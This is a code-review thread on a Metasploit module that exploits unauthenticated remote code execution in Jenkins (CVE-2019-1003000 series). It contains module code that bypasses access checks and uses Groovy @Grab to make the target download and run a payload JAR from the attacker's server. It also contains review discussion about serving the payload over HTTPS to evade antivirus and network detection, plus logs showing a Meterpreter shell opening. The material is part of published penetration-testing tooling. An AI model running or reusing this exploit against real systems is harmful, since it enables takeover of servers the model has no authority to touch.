modules/exploits/multi/http/jenkins_metaprogramming.rb

```diff
@@ -0,0 +1,159 @@
+        'Orange Tsai', # Discovery and PoC
+        'wvu'          # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2019-1003000'], # Script Security
+        ['CVE', '2019-1003001'], # Pipeline: Groovy
+        ['CVE', '2019-1003002'], # Pipeline: Declarative
+        ['EDB', '46427'],
+        ['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],
+        ['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],
+        ['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html']
+      ],
+      'DisclosureDate' => '2019-01-08', # Public disclosure
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)', {}]
+      ],
+      'DefaultTarget'  => 0,
+      'Notes'          => {
+        'Stability'    => [CRASH_SAFE],
+        'SideEffects'  => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+        'Reliability'  => [REPEATABLE_SESSION]
+      },
+      'Stance'         => Stance::Aggressive # Be aggressive, b-e aggressive!
+    ))
+
+    register_options([
+      Opt::RPORT(8080)
+    ])
+
+    deregister_options('URIPATH')
+  end
+
+  def on_request_uri(cli, request)
+    vprint_status("#{request.uri} requested")
+
+    unless request.uri.end_with?('.jar')
+      vprint_error('Sending 404')
+      send_not_found(cli)
+      return
+    end
+
+    vprint_good('Sending payload JAR')
+    send_response(
+      cli,
+      payload_jar,
+      'Content-Type' => 'application/java-archive'
+    )
+  end
+
+  def exploit
+    # HACK: Both HttpClient and HttpServer use datastore['SSL']
+    ssl = datastore['SSL']
+    datastore['SSL'] = false
+    start_service('Path' => '/metasploit/exploit/1.0/exploit-1.0.jar')
+    datastore['SSL'] = ssl
+
+    send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => go_go_gadget1,
+      'vars_get' => {'value' => go_go_gadget2}
+    )
+  end
+
+=begin
+  http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
+  ?apiUrl=http://169.254.169.254/%23
+  &login=orange
+  &password=tsai
+=end
+  def go_go_gadget1
+    normalize_uri(
+      '/securityRealm/user/admin', # ACL bypass
+      '/descriptorByName',
+      '/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile'
+    )
+  end
+
+=begin
+  http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
+  ?value=
+  @GrabConfig(disableChecksums=true)%0a
+  @GrabResolver(name='orange.tw', root='http://[your_host]/')%0a
+  @Grab(group='tw.orange', module='poc', version='1')%0a
+  import Orange;
+=end
+  def go_go_gadget2
+    (
+      <<~EOF
+        @GrabResolver("http://#{srvhost_addr}:#{srvport}/")
```

Comment:
can we optionally (or always) serve the jar over HTTPS?
i noticed the SSL hack but HTTPS will make it easy to work with AV/NIDS.

Reply:
HTTPS didn't work for me yet, but I plan to support it if I can make it work.

Reply:
Fresh environment:

```
msf5 exploit(multi/http/jenkins_metaprogramming) > git diff
[*] exec: git diff

diff --git a/modules/exploits/multi/http/jenkins_metaprogramming.rb b/modules/exploits/multi/http/jenkins_metaprogramming.rb
index ffc951f4f6..b290f940df 100644
--- a/modules/exploits/multi/http/jenkins_metaprogramming.rb
+++ b/modules/exploits/multi/http/jenkins_metaprogramming.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     # HACK: Both HttpClient and HttpServer use datastore['SSL']
     ssl = datastore['SSL']
-    datastore['SSL'] = false
+    datastore['SSL'] = true
     start_service('Path' => '/metasploit/exploit/1.0/exploit-1.0.jar')
     datastore['SSL'] = ssl

@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
     (
       <<~EOF
         @GrabConfig(disableChecksums=true)
-        @GrabResolver("http://#{srvhost_addr}:#{srvport}/")
+        @GrabResolver("https://#{srvhost_addr}:#{srvport}/")
         @Grab("metasploit:exploit:1.0")
         import Exploit
       EOF
msf5 exploit(multi/http/jenkins_metaprogramming) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Using URL: https://0.0.0.0:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] Local IP: https://192.168.1.2:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/jenkins_metaprogramming) >
```

```
bash-4.4$ find
.
./resolved-caller-all-caller-working28.properties
./resolved-caller-all-caller-working28.xml
./metasploit
./metasploit/exploit
./metasploit/exploit/jars
./metasploit/exploit/ivydata-1.0.properties
./metasploit/exploit/ivy-1.0.xml
bash-4.4$ rm -rf *
bash-4.4$
```

```
msf5 exploit(multi/http/jenkins_metaprogramming) > git stash
[*] exec: git stash

Saved working directory and index state WIP on feature/jenkins: 288f6d52f4 Merge remote-tracking branch 'upstream/master' into feature/jenkins
msf5 exploit(multi/http/jenkins_metaprogramming) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Using URL: http://0.0.0.0:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] Local IP: http://192.168.1.2:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] /metasploit/exploit/1.0/exploit-1.0.jar requested
[+] Sending payload JAR
[*] Sending stage (53866 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:57897) at 2019-03-06 01:27:48 -0600
[*] Server stopped.

meterpreter >
```

```
bash-4.4$ find
.
./metasploit
./metasploit/exploit
./metasploit/exploit/jars
./metasploit/exploit/jars/exploit-1.0.jar
./metasploit/exploit/ivydata-1.0.properties
./metasploit/exploit/ivy-1.0.xml
bash-4.4$
```

Reply:
Ivy is trying HTTP despite being given an HTTPS URL. I guess that settles it.

```
    1   0.000000  192.168.1.2 → 192.168.1.2  TCP 68 58813 → 8081 [SYN] Seq=0 Win=65535 Len=0 MSS=16344 WS=64 TSval=2558324949 TSecr=0 SACK_PERM=1
    2   0.000066  192.168.1.2 → 192.168.1.2  TCP 68 8081 → 58813 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=16344 WS=64 TSval=2558324949 TSecr=2558324949 SACK_PERM=1
    3   0.000077  192.168.1.2 → 192.168.1.2  TCP 56 58813 → 8081 [ACK] Seq=1 Ack=1 Win=408256 Len=0 TSval=2558324949 TSecr=2558324949
    4   0.000085  192.168.1.2 → 192.168.1.2  TCP 56 [TCP Window Update] 8081 → 58813 [ACK] Seq=1 Ack=1 Win=408256 Len=0 TSval=2558324949 TSecr=2558324949
    5   0.000505  192.168.1.2 → 192.168.1.2  HTTP 283 GET /metasploit/exploit/1.0/exploit-1.0.jar HTTP/1.1
    6   0.000525  192.168.1.2 → 192.168.1.2  TCP 56 8081 → 58813 [ACK] Seq=1 Ack=228 Win=408064 Len=0 TSval=2558324949 TSecr=2558324949
    7   0.000610  192.168.1.2 → 192.168.1.2  TCP 44 8081 → 58813 [RST, ACK] Seq=1 Ack=228 Win=408064 Len=0
    8   0.001175  192.168.1.2 → 192.168.1.2  TCP 68 58814 → 8081 [SYN] Seq=0 Win=65535 Len=0 MSS=16344 WS=64 TSval=2558324950 TSecr=0 SACK_PERM=1
    9   0.001228  192.168.1.2 → 192.168.1.2  TCP 68 8081 → 58814 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=16344 WS=64 TSval=2558324950 TSecr=2558324950 SACK_PERM=1
   10   0.001236  192.168.1.2 → 192.168.1.2  TCP 56 58814 → 8081 [ACK] Seq=1 Ack=1 Win=408256 Len=0 TSval=2558324950 TSecr=2558324950
   11   0.001241  192.168.1.2 → 192.168.1.2  TCP 56 [TCP Window Update] 8081 → 58814 [ACK] Seq=1 Ack=1 Win=408256 Len=0 TSval=2558324950 TSecr=2558324950
   12   0.001546  192.168.1.2 → 192.168.1.2  HTTP 283 GET /metasploit/exploit/1.0/exploit-1.0.jar HTTP/1.1
   13   0.001561  192.168.1.2 → 192.168.1.2  TCP 56 8081 → 58814 [ACK] Seq=1 Ack=228 Win=408064 Len=0 TSval=2558324950 TSecr=2558324950
   14   0.104706  192.168.1.2 → 192.168.1.2  TCP 44 8081 → 58814 [RST, ACK] Seq=1 Ack=228 Win=408064 Len=0
```

```
    1   0.000000  192.168.1.2 → 192.168.1.2  TCP 68 58820 → 8081 [SYN] Seq=0 Win=65535 Len=0 MSS=16344 WS=64 TSval=2558436755 TSecr=0 SACK_PERM=1
    2   0.000061  192.168.1.2 → 192.168.1.2  TCP 68 8081 → 58820 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=16344 WS=64 TSval=2558436755 TSecr=2558436755 SACK_PERM=1
    3   0.000071  192.168.1.2 → 192.168.1.2  TCP 56 58820 → 8081 [ACK] Seq=1 Ack=1 Win=408256 Len=0 TSval=2558436755 TSecr=2558436755
    4   0.000079  192.168.1.2 → 192.168.1.2  TCP 56 [TCP Window Update] 8081 → 58820 [ACK] Seq=1 Ack=1 Win=408256 Len=0 TSval=2558436755 TSecr=2558436755
    5   0.000478  192.168.1.2 → 192.168.1.2  HTTP 283 GET /metasploit/exploit/1.0/exploit-1.0.jar HTTP/1.1
    6   0.000494  192.168.1.2 → 192.168.1.2  TCP 56 8081 → 58820 [ACK] Seq=1 Ack=228 Win=408064 Len=0 TSval=2558436755 TSecr=2558436755
    7   0.003513  192.168.1.2 → 192.168.1.2  HTTP 5997 HTTP/1.1 200 OK  (application/java-archive)
    8   0.003537  192.168.1.2 → 192.168.1.2  TCP 56 58820 → 8081 [ACK] Seq=228 Ack=5942 Win=402304 Len=0 TSval=2558436758 TSecr=2558436758
    9   1.050600  192.168.1.2 → 192.168.1.2  TCP 44 [TCP Keep-Alive] 58820 → 8081 [ACK] Seq=227 Ack=5942 Win=402304 Len=0
   10   1.050653  192.168.1.2 → 192.168.1.2  TCP 56 [TCP Keep-Alive ACK] 8081 → 58820 [ACK] Seq=5942 Ack=228 Win=408064 Len=0 TSval=2558437780 TSecr=2558436758
   11   2.082260  192.168.1.2 → 192.168.1.2  TCP 44 [TCP Keep-Alive] 58820 → 8081 [ACK] Seq=227 Ack=5942 Win=402304 Len=0
   12   2.082318  192.168.1.2 → 192.168.1.2  TCP 56 [TCP Keep-Alive ACK] 8081 → 58820 [ACK] Seq=5942 Ack=228 Win=408064 Len=0 TSval=2558438804 TSecr=2558436758
   13   2.241132  192.168.1.2 → 192.168.1.2  TCP 56 8081 → 58820 [FIN, ACK] Seq=5942 Ack=228 Win=408064 Len=0 TSval=2558438960 TSecr=2558436758
   14   2.241150  192.168.1.2 → 192.168.1.2  TCP 56 58820 → 8081 [ACK] Seq=228 Ack=5943 Win=402304 Len=0 TSval=2558438960 TSecr=2558438960
   15   3.281084  192.168.1.2 → 192.168.1.2  TCP 44 [TCP Keep-Alive] 58820 → 8081 [ACK] Seq=227 Ack=5943 Win=402304 Len=0
   16   3.281155  192.168.1.2 → 192.168.1.2  TCP 56 [TCP Keep-Alive ACK] 8081 → 58820 [ACK] Seq=5943 Ack=228 Win=408064 Len=0 TSval=2558439995 TSecr=2558438960
   17   4.387887  192.168.1.2 → 192.168.1.2  TCP 44 [TCP Keep-Alive] 58820 → 8081 [ACK] Seq=227 Ack=5943 Win=402304 Len=0
   18   4.387962  192.168.1.2 → 192.168.1.2  TCP 56 [TCP Keep-Alive ACK] 8081 → 58820 [ACK] Seq=5943 Ack=228 Win=408064 Len=0 TSval=2558441096 TSecr=2558438960
   19   5.008099  192.168.1.2 → 192.168.1.2  TCP 56 58820 → 8081 [FIN, ACK] Seq=228 Ack=5943 Win=402304 Len=0 TSval=2558441712 TSecr=2558441096
   20   5.008175  192.168.1.2 → 192.168.1.2  TCP 56 8081 → 58820 [ACK] Seq=5943 Ack=229 Win=408064 Len=0 TSval=2558441712 TSecr=2558441712
```